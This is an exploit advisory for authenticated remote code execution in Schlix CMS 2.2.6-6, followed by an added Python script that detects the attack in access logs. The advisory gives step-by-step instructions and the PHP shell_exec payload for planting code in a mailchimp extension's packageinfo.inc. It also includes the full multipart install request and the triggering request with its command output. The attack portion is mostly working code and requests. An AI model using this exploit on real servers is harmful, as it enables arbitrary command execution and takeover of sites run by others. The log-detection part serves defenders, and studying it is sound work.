# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==

1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in the '/blocks/mailchimp' directory.
6- Paste the PHP code below into it and save it.

#####################################
<?php
// Runs the command on the web server and echoes its output into the page.
$command = shell_exec('netstat -an');
echo "$command";
?>
#####################################

7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install the package into the created category and open the installed 'mailchimp' extension.
9- Click the 'About' tab and our PHP code will be executed.

==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==

<?php
$command = shell_exec('netstat -an');
echo "$command";
?>

==> HTTP Request (ZIP Extension Installation) <==

POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"

a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed

#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"

0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"

20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"

# Your ACC Password.
-----------------------------29322337091578227221515354130--

==> HTTP Request (RCE - About Tab) <==

GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1

==> HTTP Response (RCE - About Tab) <==

HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575
Active Connections

  Proto  Local Address          Foreign Address        State
  (netstat -an connection rows omitted)
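From the defender's side, the two requests above form a recognisable sequence in the web server access log: a POST to /admin/app/core.blockmanager with action=install followed by a GET with action=edititem from the same client. The following is an added example, not part of the original advisory, that flags that sequence in constructed combined-format log lines; the IPs, usernames and timestamps are sample data.

```python
"""Flag package installs that are followed by a block view in the Schlix
block manager, the request sequence shown in the advisory above.
Added example: the log lines, client IPs and timestamps are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not from a real host).
SAMPLE_LOG = """\
10.0.0.5 - admin [06/May/2021:00:14:01 +0300] "POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1" 200 512
10.0.0.5 - admin [06/May/2021:00:14:20 +0300] "GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1" 200 49575
10.0.0.9 - editor [06/May/2021:00:15:03 +0300] "GET /admin/app/core.blockmanager?action=edititem&id=12 HTTP/1.1" 200 2210
10.0.0.7 - admin [06/May/2021:00:16:44 +0300] "POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1" 200 512
"""

BLOCK_MANAGER = "/admin/app/core.blockmanager"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    rec["endpoint"] = url.path
    query = parse_qs(url.query)  # tolerates the leading '&' in the install URL
    rec["action"] = query.get("action", [""])[0]
    rec["id"] = query.get("id", [""])[0]
    return rec


def find_install_then_edit(log_text):
    """Return (ip, user, install_ts, view_ts, block_id) for every client that
    uploaded a package via action=install and later opened a block (edititem)."""
    pending = defaultdict(list)  # (ip, user) -> install records seen so far
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["endpoint"] != BLOCK_MANAGER:
            continue
        key = (rec["ip"], rec["user"])
        if rec["method"] == "POST" and rec["action"] == "install":
            pending[key].append(rec)
        elif rec["method"] == "GET" and rec["action"] == "edititem" and pending[key]:
            inst = pending[key][-1]
            hits.append((rec["ip"], rec["user"], inst["ts"], rec["ts"], rec["id"]))
    return hits


if __name__ == "__main__":
    for hit in find_install_then_edit(SAMPLE_LOG):
        print("package install followed by block view: ip=%s user=%s install=%s view=%s id=%s" % hit)
```

Only the client that both uploaded a package and then opened a block is reported; a lone install or a lone block view is not flagged, so the output is a short review list rather than an alert on every admin action.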